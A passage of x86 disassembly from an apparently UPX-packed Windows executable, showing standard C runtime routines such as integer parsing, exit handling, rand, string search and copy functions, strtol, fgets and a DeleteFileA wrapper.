ebx loc_41B73A: ; CODE XREF: sub_41B6EE+7Bj cmp dword_43CBE4, 1 jle short loc_41B74F push 4 push esi call sub_41F515 pop ecx pop ecx jmp short loc_41B75A ; --------------------------------------------------------------------------- loc_41B74F: ; CODE XREF: sub_41B6EE+53j mov eax, off_43C9D8 mov al, [eax+esi*2] and eax, 4 loc_41B75A: ; CODE XREF: sub_41B6EE+5Fj test eax, eax jz short loc_41B76B lea eax, [ebx+ebx*4] lea ebx, [esi+eax*2-30h] movzx esi, byte ptr [edi] inc edi jmp short loc_41B73A ; --------------------------------------------------------------------------- loc_41B76B: ; CODE XREF: sub_41B6EE+6Ej cmp ebp, 2Dh mov eax, ebx jnz short loc_41B774 neg eax loc_41B774: ; CODE XREF: sub_41B6EE+82j pop edi pop esi pop ebp pop ebx retn sub_41B6EE endp ; =============== S U B R O U T I N E ======================================= sub_41B779 proc near ; CODE XREF: sub_401221+306p ; sub_401ACD+733p ... arg_0 = dword ptr 4 push [esp+arg_0] call sub_41B6EE pop ecx retn sub_41B779 endp ; =============== S U B R O U T I N E ======================================= sub_41B784 proc near ; CODE XREF: UPX0:0041D9C6p mov eax, off_43A97C test eax, eax jz short loc_41B78F call eax ; sub_41C748 loc_41B78F: ; CODE XREF: sub_41B784+7j push offset dword_42902C push offset dword_429018 call sub_41B86C push offset dword_429014 push offset dword_429000 call sub_41B86C add esp, 10h retn sub_41B784 endp ; =============== S U B R O U T I N E ======================================= sub_41B7B1 proc near ; CODE XREF: UPX0:0041DA05p arg_0 = dword ptr 4 push 0 push 0 push [esp+8+arg_0] call sub_41B7D3 add esp, 0Ch retn sub_41B7B1 endp ; =============== S U B R O U T I N E ======================================= sub_41B7C2 proc near ; CODE XREF: UPX0:0041DA24p ; sub_41DA29+1Cp ... arg_0 = dword ptr 4 push 0 push 1 push [esp+8+arg_0] call sub_41B7D3 add esp, 0Ch retn sub_41B7C2 endp ; =============== S U B R O U T I N E ======================================= sub_41B7D3 proc near ; CODE XREF: sub_41B7B1+8p ; sub_41B7C2+8p arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push edi push 1 pop edi cmp ds:dword_4DB9A0, edi jnz short loc_41B7F0 push [esp+4+arg_0] call dword_4270F8 ; GetCurrentProcess push eax call dword_4270F0 ; TerminateProcess loc_41B7F0: ; CODE XREF: sub_41B7D3+Aj cmp [esp+4+arg_4], 0 push ebx mov ebx, [esp+8+arg_8] mov ds:dword_4DB99C, edi mov ds:byte_4DB998, bl jnz short loc_41B844 mov eax, ds:dword_4DCFFC test eax, eax jz short loc_41B833 mov ecx, ds:dword_4DCFF8 push esi lea esi, [ecx-4] cmp esi, eax jb short loc_41B832 loc_41B81F: ; CODE XREF: sub_41B7D3+5Dj mov eax, [esi] test eax, eax jz short loc_41B827 call eax loc_41B827: ; CODE XREF: sub_41B7D3+50j sub esi, 4 cmp esi, ds:dword_4DCFFC jnb short loc_41B81F loc_41B832: ; CODE XREF: sub_41B7D3+4Aj pop esi loc_41B833: ; CODE XREF: sub_41B7D3+3Cj push offset dword_429038 push offset dword_429030 call sub_41B86C pop ecx pop ecx loc_41B844: ; CODE XREF: sub_41B7D3+33j push offset dword_429044 push offset dword_42903C call sub_41B86C pop ecx pop ecx test ebx, ebx pop ebx jnz short loc_41B86A push [esp+4+arg_0] mov ds:dword_4DB9A0, edi call dword_427064 ; ExitProcess loc_41B86A: ; CODE XREF: sub_41B7D3+85j pop edi retn sub_41B7D3 endp ; =============== S U B R O U T I N E ======================================= sub_41B86C proc near ; CODE XREF: sub_41B784+15p ; sub_41B784+24p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push esi mov esi, [esp+4+arg_0] loc_41B871: ; CODE XREF: sub_41B86C+16j cmp esi, [esp+4+arg_4] jnb short loc_41B884 mov eax, [esi] test eax, eax jz short loc_41B87F call eax loc_41B87F: ; CODE XREF: sub_41B86C+Fj add esi, 4 jmp short loc_41B871 ; --------------------------------------------------------------------------- loc_41B884: ; CODE XREF: sub_41B86C+9j pop esi retn sub_41B86C endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B886 proc near ; CODE XREF: sub_401221+18Fp ; sub_401221+295p ... var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = byte ptr 10h push ebp mov ebp, esp sub esp, 20h mov eax, [ebp+arg_0] push esi mov [ebp+var_18], eax mov [ebp+var_20], eax lea eax, [ebp+arg_8] mov [ebp+var_14], 42h push eax lea eax, [ebp+var_20] push [ebp+arg_4] mov [ebp+var_1C], 7FFFFFFFh push eax call sub_41F69F add esp, 0Ch dec [ebp+var_1C] mov esi, eax js short loc_41B8C6 mov eax, [ebp+var_20] and byte ptr [eax], 0 jmp short loc_41B8D3 ; --------------------------------------------------------------------------- loc_41B8C6: ; CODE XREF: sub_41B886+36j lea eax, [ebp+var_20] push eax push 0 call sub_41F58A pop ecx pop ecx loc_41B8D3: ; CODE XREF: sub_41B886+3Ej mov eax, esi pop esi leave retn sub_41B886 endp ; =============== S U B R O U T I N E ======================================= sub_41B8D8 proc near ; CODE XREF: sub_401221+45p ; sub_401ACD+31A3p ... arg_0 = dword ptr 4 mov eax, [esp+arg_0] mov dword_43A960, eax retn sub_41B8D8 endp ; =============== S U B R O U T I N E ======================================= sub_41B8E2 proc near ; CODE XREF: sub_401221:loc_401379p ; sub_401221:loc_4016A7p ... mov eax, dword_43A960 imul eax, 343FDh add eax, 269EC3h mov dword_43A960, eax sar eax, 10h and eax, 7FFFh retn sub_41B8E2 endp ; =============== S U B R O U T I N E ======================================= sub_41B900 proc near ; CODE XREF: sub_401221+12Dp ; sub_401ACD+8Cp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov ecx, [esp+arg_4] push edi push ebx push esi mov dl, [ecx] mov edi, [esp+0Ch+arg_0] test dl, dl jz short loc_41B97A mov dh, [ecx+1] test dh, dh jz short loc_41B967 loc_41B918: ; CODE XREF: sub_41B900+52j ; sub_41B900+65j mov esi, edi mov ecx, [esp+0Ch+arg_4] mov al, [edi] inc esi cmp al, dl jz short loc_41B93A test al, al jz short loc_41B934 loc_41B929: ; CODE XREF: sub_41B900+32j mov al, [esi] inc esi loc_41B92C: ; CODE XREF: sub_41B900+3Fj cmp al, dl jz short loc_41B93A test al, al jnz short loc_41B929 loc_41B934: ; CODE XREF: sub_41B900+27j pop esi pop ebx pop edi xor eax, eax retn ; --------------------------------------------------------------------------- loc_41B93A: ; CODE XREF: sub_41B900+23j ; sub_41B900+2Ej mov al, [esi] inc esi cmp al, dh jnz short loc_41B92C lea edi, [esi-1] loc_41B944: ; CODE XREF: sub_41B900+63j mov ah, [ecx+2] test ah, ah jz short loc_41B973 mov al, [esi] add esi, 2 cmp al, ah jnz short loc_41B918 mov al, [ecx+3] test al, al jz short loc_41B973 mov ah, [esi-1] add ecx, 2 cmp al, ah jz short loc_41B944 jmp short loc_41B918 ; --------------------------------------------------------------------------- loc_41B967: ; CODE XREF: sub_41B900+16j xor eax, eax pop esi pop ebx pop edi mov al, dl jmp loc_41BFB6 ; --------------------------------------------------------------------------- loc_41B973: ; CODE XREF: sub_41B900+49j ; sub_41B900+59j lea eax, [edi-1] pop esi pop ebx pop edi retn ; --------------------------------------------------------------------------- loc_41B97A: ; CODE XREF: sub_41B900+Fj mov eax, edi pop esi pop ebx pop edi retn sub_41B900 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B980 proc near ; CODE XREF: sub_401221+11Ap ; sub_401ACD+1C73p ... var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = byte ptr 14h push ebp mov ebp, esp sub esp, 20h mov eax, [ebp+arg_0] push esi mov [ebp+var_18], eax mov [ebp+var_20], eax mov eax, [ebp+arg_4] mov [ebp+var_14], 42h mov [ebp+var_1C], eax lea eax, [ebp+arg_C] push eax lea eax, [ebp+var_20] push [ebp+arg_8] push eax call sub_41F69F add esp, 0Ch dec [ebp+var_1C] mov esi, eax js short loc_41B9BF mov eax, [ebp+var_20] and byte ptr [eax], 0 jmp short loc_41B9CC ; --------------------------------------------------------------------------- loc_41B9BF: ; CODE XREF: sub_41B980+35j lea eax, [ebp+var_20] push eax push 0 call sub_41F58A pop ecx pop ecx loc_41B9CC: ; CODE XREF: sub_41B980+3Dj mov eax, esi pop esi leave retn sub_41B980 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41B9D1 proc near ; CODE XREF: sub_401221+F7p ; sub_401ACD+21D2p ... var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp push ecx and [ebp+var_4], 0 push ebx mov ebx, [ebp+arg_0] push esi push edi push ebx call sub_41AFE0 cmp eax, 1 pop ecx jb short loc_41BA0C cmp byte ptr [ebx+1], 3Ah jnz short loc_41BA0C mov esi, [ebp+arg_4] test esi, esi jz short loc_41BA08 push 2 push ebx push esi call sub_420289 add esp, 0Ch and byte ptr [esi+2], 0 loc_41BA08: ; CODE XREF: sub_41B9D1+25j inc ebx inc ebx jmp short loc_41BA16 ; --------------------------------------------------------------------------- loc_41BA0C: ; CODE XREF: sub_41B9D1+18j ; sub_41B9D1+1Ej mov eax, [ebp+arg_4] test eax, eax jz short loc_41BA16 and byte ptr [eax], 0 loc_41BA16: ; CODE XREF: sub_41B9D1+39j ; sub_41B9D1+40j and [ebp+arg_4], 0 cmp byte ptr [ebx], 0 mov eax, ebx mov esi, 0FFh mov [ebp+arg_0], eax jz short loc_41BA8E loc_41BA29: ; CODE XREF: sub_41B9D1+87j mov cl, [eax] movzx edx, cl test ds:byte_4DCEC1[edx], 4 jz short loc_41BA3A inc eax jmp short loc_41BA54 ; --------------------------------------------------------------------------- loc_41BA3A: ; CODE XREF: sub_41B9D1+64j cmp cl, 2Fh jz short loc_41BA4E cmp cl, 5Ch jz short loc_41BA4E cmp cl, 2Eh jnz short loc_41BA54 mov [ebp+var_4], eax jmp short loc_41BA54 ; --------------------------------------------------------------------------- loc_41BA4E: ; CODE XREF: sub_41B9D1+6Cj ; sub_41B9D1+71j lea ecx, [eax+1] mov [ebp+arg_4], ecx loc_41BA54: ; CODE XREF: sub_41B9D1+67j ; sub_41B9D1+76j ... inc eax cmp byte ptr [eax], 0 jnz short loc_41BA29 mov edi, [ebp+arg_4] mov [ebp+arg_0], eax test edi, edi jz short loc_41BA8E cmp [ebp+arg_8], 0 jz short loc_41BA89 sub edi, ebx cmp edi, esi jb short loc_41BA72 mov edi, esi loc_41BA72: ; CODE XREF: sub_41B9D1+9Dj push edi push ebx push [ebp+arg_8] call sub_420289 mov eax, [ebp+arg_8] add esp, 0Ch and byte ptr [edi+eax], 0 mov eax, [ebp+arg_0] loc_41BA89: ; CODE XREF: sub_41B9D1+97j mov ebx, [ebp+arg_4] jmp short loc_41BA98 ; --------------------------------------------------------------------------- loc_41BA8E: ; CODE XREF: sub_41B9D1+56j ; sub_41B9D1+91j mov ecx, [ebp+arg_8] test ecx, ecx jz short loc_41BA98 and byte ptr [ecx], 0 loc_41BA98: ; CODE XREF: sub_41B9D1+BBj ; sub_41B9D1+C2j mov edi, [ebp+var_4] test edi, edi jz short loc_41BAEB cmp edi, ebx jb short loc_41BAEB cmp [ebp+arg_C], 0 jz short loc_41BAC8 sub edi, ebx cmp edi, esi jb short loc_41BAB1 mov edi, esi loc_41BAB1: ; CODE XREF: sub_41B9D1+DCj push edi push ebx push [ebp+arg_C] call sub_420289 mov eax, [ebp+arg_C] add esp, 0Ch and byte ptr [edi+eax], 0 mov eax, [ebp+arg_0] loc_41BAC8: ; CODE XREF: sub_41B9D1+D6j mov edi, [ebp+arg_10] test edi, edi jz short loc_41BB13 sub eax, [ebp+var_4] cmp eax, esi jnb short loc_41BAD8 mov esi, eax loc_41BAD8: ; CODE XREF: sub_41B9D1+103j push esi push [ebp+var_4] push edi call sub_420289 add esp, 0Ch and byte ptr [esi+edi], 0 jmp short loc_41BB13 ; --------------------------------------------------------------------------- loc_41BAEB: ; CODE XREF: sub_41B9D1+CCj ; sub_41B9D1+D0j mov edi, [ebp+arg_C] test edi, edi jz short loc_41BB09 sub eax, ebx cmp eax, esi jnb short loc_41BAFA mov esi, eax loc_41BAFA: ; CODE XREF: sub_41B9D1+125j push esi push ebx push edi call sub_420289 add esp, 0Ch and byte ptr [esi+edi], 0 loc_41BB09: ; CODE XREF: sub_41B9D1+11Fj mov eax, [ebp+arg_10] test eax, eax jz short loc_41BB13 and byte ptr [eax], 0 loc_41BB13: ; CODE XREF: sub_41B9D1+FCj ; sub_41B9D1+118j ... pop edi pop esi pop ebx leave retn sub_41B9D1 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_41BB20 proc near ; CODE XREF: sub_401955+8p ; sub_401ACD+8p ... arg_0 = byte ptr 4 push ecx cmp eax, 1000h lea ecx, [esp+4+arg_0] jb short loc_41BB40 loc_41BB2C: ; CODE XREF: sub_41BB20+1Ej sub ecx, 1000h sub eax, 1000h test [ecx], eax cmp eax, 1000h jnb short loc_41BB2C loc_41BB40: ; CODE XREF: sub_41BB20+Aj sub ecx, eax mov eax, esp test [ecx], eax mov esp, ecx mov ecx, [eax] mov eax, [eax+4] push eax retn sub_41BB20 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41BB4F proc near ; CODE XREF: sub_401ACD+757Fp ; sub_401ACD+75AEp ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp cmp [ebp+arg_4], 0 push ebx mov ebx, [ebp+arg_0] push edi mov edi, ebx jg short loc_41BB63 xor eax, eax jmp short loc_41BB99 ; --------------------------------------------------------------------------- loc_41BB63: ; CODE XREF: sub_41BB4F+Ej dec [ebp+arg_4] push esi jz short loc_41BB93 mov esi, [ebp+arg_8] loc_41BB6C: ; CODE XREF: sub_41BB4F+42j dec dword ptr [esi+4] js short loc_41BB7B mov ecx, [esi] movzx eax, byte ptr [ecx] inc ecx mov [esi], ecx jmp short loc_41BB82 ; --------------------------------------------------------------------------- loc_41BB7B: ; CODE XREF: sub_41BB4F+20j push esi call sub_41F043 pop ecx loc_41BB82: ; CODE XREF: sub_41BB4F+2Aj cmp eax, 0FFFFFFFFh jz short loc_41BB9D mov [edi], al inc edi cmp al, 0Ah jz short loc_41BB93 dec [ebp+arg_4] jnz short loc_41BB6C loc_41BB93: ; CODE XREF: sub_41BB4F+18j ; sub_41BB4F+3Dj ... and byte ptr [edi], 0 loc_41BB96: ; CODE XREF: sub_41BB4F+55j mov eax, ebx pop esi loc_41BB99: ; CODE XREF: sub_41BB4F+12j pop edi pop ebx pop ebp retn ; --------------------------------------------------------------------------- loc_41BB9D: ; CODE XREF: sub_41BB4F+36j cmp edi, [ebp+arg_0] jnz short loc_41BB93 xor ebx, ebx jmp short loc_41BB96 sub_41BB4F endp ; =============== S U B R O U T I N E ======================================= sub_41BBA6 proc near ; CODE XREF: sub_41DC8A+11Bp arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push 0 push [esp+4+arg_8] push [esp+8+arg_4] push [esp+0Ch+arg_0] call sub_41BBBD add esp, 10h retn sub_41BBA6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41BBBD proc near ; CODE XREF: sub_41BBA6+Ep ; sub_41BDC5+Ep var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 0Ch push ebx and [ebp+var_8], 0 push esi push edi mov edi, [ebp+arg_0] mov bl, [edi] lea esi, [edi+1] mov [ebp+var_4], esi loc_41BBD5: ; CODE XREF: sub_41BBBD+46j cmp dword_43CBE4, 1 jle short loc_41BBED movzx eax, bl push 8 push eax call sub_41F515 pop ecx pop ecx jmp short loc_41BBFC ; --------------------------------------------------------------------------- loc_41BBED: ; CODE XREF: sub_41BBBD+1Fj mov ecx, off_43C9D8 movzx eax, bl mov al, [ecx+eax*2] and eax, 8 loc_41BBFC: ; CODE XREF: sub_41BBBD+2Ej test eax, eax jz short loc_41BC05 mov bl, [esi] inc esi jmp short loc_41BBD5 ; --------------------------------------------------------------------------- loc_41BC05: ; CODE XREF: sub_41BBBD+41j cmp bl, 2Dh mov [ebp+var_4], esi jnz short loc_41BC13 or [ebp+arg_C], 2 jmp short loc_41BC18 ; --------------------------------------------------------------------------- loc_41BC13: ; CODE XREF: sub_41BBBD+4Ej cmp bl, 2Bh jnz short loc_41BC1E loc_41BC18: ; CODE XREF: sub_41BBBD+54j mov bl, [esi] inc esi mov [ebp+var_4], esi loc_41BC1E: ; CODE XREF: sub_41BBBD+59j mov eax, [ebp+arg_8] test eax, eax jl loc_41BDB5 cmp eax, 1 jz loc_41BDB5 cmp eax, 24h jg loc_41BDB5 push 10h test eax, eax pop ecx jnz short loc_41BC66 cmp bl, 30h jz short loc_41BC50 mov [ebp+arg_8], 0Ah jmp short loc_41BC82 ; --------------------------------------------------------------------------- loc_41BC50: ; CODE XREF: sub_41BBBD+88j mov al, [esi] cmp al, 78h jz short loc_41BC63 cmp al, 58h jz short loc_41BC63 mov [ebp+arg_8], 8 jmp short loc_41BC82 ; --------------------------------------------------------------------------- loc_41BC63: ; CODE XREF: sub_41BBBD+97j ; sub_41BBBD+9Bj mov [ebp+arg_8], ecx loc_41BC66: ; CODE XREF: sub_41BBBD+83j cmp [ebp+arg_8], ecx jnz short loc_41BC82 cmp bl, 30h jnz short loc_41BC82 mov al, [esi] cmp al, 78h jz short loc_41BC7A cmp al, 58h jnz short loc_41BC82 loc_41BC7A: ; CODE XREF: sub_41BBBD+B7j mov bl, [esi+1] inc esi inc esi mov [ebp+var_4], esi loc_41BC82: ; CODE XREF: sub_41BBBD+91j ; sub_41BBBD+A4j ... or eax, 0FFFFFFFFh xor edx, edx div [ebp+arg_8] mov edi, 103h mov [ebp+var_C], eax loc_41BC92: ; CODE XREF: sub_41BBBD+16Cj cmp dword_43CBE4, 1 movzx esi, bl jle short loc_41BCAA push 4 push esi call sub_41F515 pop ecx pop ecx jmp short loc_41BCB5 ; --------------------------------------------------------------------------- loc_41BCAA: ; CODE XREF: sub_41BBBD+DFj mov eax, off_43C9D8 mov al, [eax+esi*2] and eax, 4 loc_41BCB5: ; CODE XREF: sub_41BBBD+EBj test eax, eax jz short loc_41BCC1 movsx ecx, bl sub ecx, 30h jmp short loc_41BCF3 ; --------------------------------------------------------------------------- loc_41BCC1: ; CODE XREF: sub_41BBBD+FAj cmp dword_43CBE4, 1 jle short loc_41BCD5 push edi push esi call sub_41F515 pop ecx pop ecx jmp short loc_41BCE0 ; --------------------------------------------------------------------------- loc_41BCD5: ; CODE XREF: sub_41BBBD+10Bj mov eax, off_43C9D8 mov ax, [eax+esi*2] and eax, edi loc_41BCE0: ; CODE XREF: sub_41BBBD+116j test eax, eax jz short loc_41BD2E movsx eax, bl push eax call sub_420313 pop ecx mov ecx, eax sub ecx, 37h loc_41BCF3: ; CODE XREF: sub_41BBBD+102j cmp ecx, [ebp+arg_8] jnb short loc_41BD2E mov esi, [ebp+var_8] or [ebp+arg_C], 8 cmp esi, [ebp+var_C] jb short loc_41BD18 jnz short loc_41BD12 or eax, 0FFFFFFFFh xor edx, edx div [ebp+arg_8] cmp ecx, edx jbe short loc_41BD18 loc_41BD12: ; CODE XREF: sub_41BBBD+147j or [ebp+arg_C], 4 jmp short loc_41BD21 ; --------------------------------------------------------------------------- loc_41BD18: ; CODE XREF: sub_41BBBD+145j ; sub_41BBBD+153j imul esi, [ebp+arg_8] add esi, ecx mov [ebp+var_8], esi loc_41BD21: ; CODE XREF: sub_41BBBD+159j mov eax, [ebp+var_4] inc [ebp+var_4] mov bl, [eax] jmp loc_41BC92 ; --------------------------------------------------------------------------- loc_41BD2E: ; CODE XREF: sub_41BBBD+125j ; sub_41BBBD+139j mov ecx, [ebp+arg_C] dec [ebp+var_4] mov edx, [ebp+arg_4] test cl, 8 jnz short loc_41BD4C test edx, edx jz short loc_41BD46 mov eax, [ebp+arg_0] mov [ebp+var_4], eax loc_41BD46: ; CODE XREF: sub_41BBBD+181j and [ebp+var_8], 0 jmp short loc_41BD99 ; --------------------------------------------------------------------------- loc_41BD4C: ; CODE XREF: sub_41BBBD+17Dj test cl, 4 mov eax, 7FFFFFFFh jnz short loc_41BD72 test cl, 1 jnz short loc_41BD99 and ecx, 2 jz short loc_41BD69 cmp [ebp+var_8], 80000000h ja short loc_41BD72 loc_41BD69: ; CODE XREF: sub_41BBBD+1A1j test ecx, ecx jnz short loc_41BD99 cmp [ebp+var_8], eax jbe short loc_41BD99 loc_41BD72: ; CODE XREF: sub_41BBBD+197j ; sub_41BBBD+1AAj test byte ptr [ebp+arg_C], 1 mov ds:dword_4DB958, 22h jz short loc_41BD88 or [ebp+var_8], 0FFFFFFFFh jmp short loc_41BD99 ; --------------------------------------------------------------------------- loc_41BD88: ; CODE XREF: sub_41BBBD+1C3j mov ecx, [ebp+arg_C] and cl, 2 neg cl sbb ecx, ecx neg ecx add ecx, eax mov [ebp+var_8], ecx loc_41BD99: ; CODE XREF: sub_41BBBD+18Dj ; sub_41BBBD+19Cj ... test edx, edx jz short loc_41BDA2 mov eax, [ebp+var_4] mov [edx], eax loc_41BDA2: ; CODE XREF: sub_41BBBD+1DEj test byte ptr [ebp+arg_C], 2 jz short loc_41BDB0 mov eax, [ebp+var_8] neg eax mov [ebp+var_8], eax loc_41BDB0: ; CODE XREF: sub_41BBBD+1E9j mov eax, [ebp+var_8] jmp short loc_41BDC0 ; --------------------------------------------------------------------------- loc_41BDB5: ; CODE XREF: sub_41BBBD+66j ; sub_41BBBD+6Fj ... mov eax, [ebp+arg_4] test eax, eax jz short loc_41BDBE mov [eax], edi loc_41BDBE: ; CODE XREF: sub_41BBBD+1FDj xor eax, eax loc_41BDC0: ; CODE XREF: sub_41BBBD+1F6j pop edi pop esi pop ebx leave retn sub_41BBBD endp ; =============== S U B R O U T I N E ======================================= sub_41BDC5 proc near ; CODE XREF: sub_401ACD+61CFp ; sub_401ACD+6A10p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push 1 push [esp+4+arg_8] push [esp+8+arg_4] push [esp+0Ch+arg_0] call sub_41BBBD add esp, 10h retn sub_41BDC5 endp ; =============== S U B R O U T I N E ======================================= sub_41BDDC proc near ; CODE XREF: sub_401ACD+5981p arg_0 = dword ptr 4 push [esp+arg_0] call dword_427080 ; DeleteFileA test eax, eax jnz short loc_41BDF2 call dword_42708C ; RtlGetLastWin32Error jmp short loc_41BDF4 ; --------------------------------------------------------------------------- loc_41BDF2: ; CODE XREF: sub_41BDDC+Cj xor eax, eax loc_41BDF4: ; CODE XREF: sub_41BDDC+14j test eax, eax jz short loc_41BE03 push eax call sub_4203DF pop ecx or eax, 0FFFFFFFFh retn ; --------------------------------------------------------------------------- loc_41BE03: ; CODE XREF: sub_41BDDC+1Aj xor eax, eax retn sub_41BDDC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41BE06 proc near ; CODE XREF: sub_401ACD+58D3p ; sub_411C14+8Ep arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = byte ptr 10h push ebp mov ebp, esp push esi push edi push [ebp+arg_0] call sub_420446 mov esi, eax lea eax, [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_41F69F push [ebp+arg_0] mov edi, eax push esi call sub_4204D3 add esp, 18h mov eax, edi pop edi pop esi pop ebp retn sub_41BE06 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41BE40 proc near ; CODE XREF: sub_401ACD+1E82p ; sub_401ACD+1EA1p ... arg_0 = dword ptr 8 arg_4 = byte ptr 0Ch push ebp mov ebp, esp push edi mov edi, [ebp+arg_0] xor eax, eax or ecx, 0FFFFFFFFh repne scasb inc ecx neg ecx dec edi mov al, [ebp+arg_4] std repne scasb inc edi cmp [edi], al jz short loc_41BE61 xor eax, eax jmp short loc_41BE63 ; --------------------------------------------------------------------------- loc_41BE61: ; CODE XREF: sub_41BE40+1Bj mov eax, edi loc_41BE63: ; CODE XREF: sub_41BE40+1Fj cld pop edi leave retn sub_41BE40 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41BE70 proc near ; CODE XREF: sub_401ACD+870p ; sub_41DC8A+93p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push edi push esi push ebx mov ecx, [ebp+arg_8] jecxz short loc_41BEA1 mov ebx, ecx mov edi, [ebp+arg_0] mov esi, edi xor eax, eax repne scasb neg ecx add ecx, ebx mov edi, esi mov esi, [ebp+arg_4] repe cmpsb mov al, [esi-1] xor ecx, ecx cmp al, [edi-1] ja short loc_41BE9F jz short loc_41BEA1 dec ecx dec ecx loc_41BE9F: ; CODE XREF: sub_41BE70+29j not ecx loc_41BEA1: ; CODE XREF: sub_41BE70+9j ; sub_41BE70+2Bj mov eax, ecx pop ebx pop esi pop edi leave retn sub_41BE70 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_41BEB0 proc near ; CODE XREF: sub_401ACD+42Fp ; sub_401ACD+2FFDp ... arg_0 = dword ptr 4 push edi mov edi, [esp+4+arg_0] jmp short loc_41BF21 sub_41BEB0 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_41BEC0 proc near ; CODE XREF: sub_401ACD+438p ; sub_401ACD+75FFp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov ecx, [esp+arg_0] push edi test ecx, 3 jz short loc_41BEDC loc_41BECD: ; CODE XREF: sub_41BEC0+1Aj mov al, [ecx] inc ecx test al, al jz short loc_41BF0F test ecx, 3 jnz short loc_41BECD loc_41BEDC: ; CODE XREF: sub_41BEC0+Bj ; sub_41BEC0+32j ... mov eax, [ecx] mov edx, 7EFEFEFFh add edx, eax xor eax, 0FFFFFFFFh xor eax, edx add ecx, 4 test eax, 81010100h jz short loc_41BEDC mov eax, [ecx-4] test al, al jz short loc_41BF1E test ah, ah jz short loc_41BF19 test eax, 0FF0000h jz short loc_41BF14 test eax, 0FF000000h jz short loc_41BF0F jmp short loc_41BEDC ; --------------------------------------------------------------------------- loc_41BF0F: ; CODE XREF: sub_41BEC0+12j ; sub_41BEC0+4Bj lea edi, [ecx-1] jmp short loc_41BF21 ; --------------------------------------------------------------------------- loc_41BF14: ; CODE XREF: sub_41BEC0+44j lea edi, [ecx-2] jmp short loc_41BF21 ; --------------------------------------------------------------------------- loc_41BF19: ; CODE XREF: sub_41BEC0+3Dj lea edi, [ecx-3] jmp short loc_41BF21 ; --------------------------------------------------------------------------- loc_41BF1E: ; CODE XREF: sub_41BEC0+39j lea edi, [ecx-4] loc_41BF21: ; CODE XREF: sub_41BEB0+5j ; sub_41BEC0+52j ... mov ecx, [esp+4+arg_4] test ecx, 3 jz short loc_41BF46 loc_41BF2D: ; CODE XREF: sub_41BEC0+7Dj mov dl, [ecx] inc ecx test dl, dl jz short loc_41BF98 mov [edi], dl inc edi test ecx, 3 jnz short loc_41BF2D jmp short loc_41BF46 ; --------------------------------------------------------------------------- loc_41BF41: ; CODE XREF: sub_41BEC0+9Ej ; sub_41BEC0+B8j mov [edi], edx add edi, 4 loc_41BF46: ; CODE XREF: sub_41BEC0+6Bj ; sub_41BEC0+7Fj mov edx, 7EFEFEFFh mov eax, [ecx] add edx, eax xor eax, 0FFFFFFFFh xor eax, edx mov edx, [ecx] add ecx, 4 test eax, 81010100h jz short loc_41BF41 test dl, dl jz short loc_41BF98 test dh, dh jz short loc_41BF8F test edx, 0FF0000h jz short loc_41BF82 test edx, 0FF000000h jz short loc_41BF7A jmp short loc_41BF41 ; --------------------------------------------------------------------------- loc_41BF7A: ; CODE XREF: sub_41BEC0+B6j mov [edi], edx mov eax, [esp+4+arg_0] pop edi retn ; --------------------------------------------------------------------------- loc_41BF82: ; CODE XREF: sub_41BEC0+AEj mov [edi], dx mov eax, [esp+4+arg_0] mov byte ptr [edi+2], 0 pop edi retn ; --------------------------------------------------------------------------- loc_41BF8F: ; CODE XREF: sub_41BEC0+A6j mov [edi], dx mov eax, [esp+4+arg_0] pop edi retn ; --------------------------------------------------------------------------- loc_41BF98: ; CODE XREF: sub_41BEC0+72j ; sub_41BEC0+A2j mov [edi], dl mov eax, [esp+4+arg_0] pop edi retn sub_41BEC0 endp ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_41BFB0 loc_41BFA0: ; CODE XREF: sub_41BFB0+1Dj lea eax, [edx-1] pop ebx retn ; END OF FUNCTION CHUNK FOR sub_41BFB0 ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_41BFB0 proc near ; CODE XREF: sub_401ACD+414p ; sub_401ACD+4C3p ... arg_0 = dword ptr 4 arg_4 = byte ptr 8 ; FUNCTION CHUNK AT 0041BFA0 SIZE 00000005 BYTES xor eax, eax mov al, [esp+arg_4] loc_41BFB6: ; CODE XREF: sub_41B900+6Ej push ebx mov ebx, eax shl eax, 8 mov edx, 